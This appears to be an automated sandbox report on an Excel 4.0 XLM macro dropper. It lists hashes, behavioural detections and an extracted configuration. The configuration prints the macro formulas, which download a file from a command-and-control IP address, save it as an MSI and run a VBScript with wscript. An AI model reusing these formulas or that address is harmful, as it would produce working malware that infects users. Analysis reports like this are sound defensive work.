General

  • Target

    b10e20019338f116e68cc34f9932e12f

  • Size

    6KB

  • Sample

    231222-q7mjwadceq

  • MD5

    b10e20019338f116e68cc34f9932e12f

  • SHA1

    6514c0b127c01c02f471f643772bed51abda6d39

  • SHA256

    4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763

  • SHA512

    cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020

  • SSDEEP

    192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      b10e20019338f116e68cc34f9932e12f

    • Size

      6KB

    • MD5

      b10e20019338f116e68cc34f9932e12f

    • SHA1

      6514c0b127c01c02f471f643772bed51abda6d39

    • SHA256

      4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763

    • SHA512

      cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020

    • SSDEEP

      192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks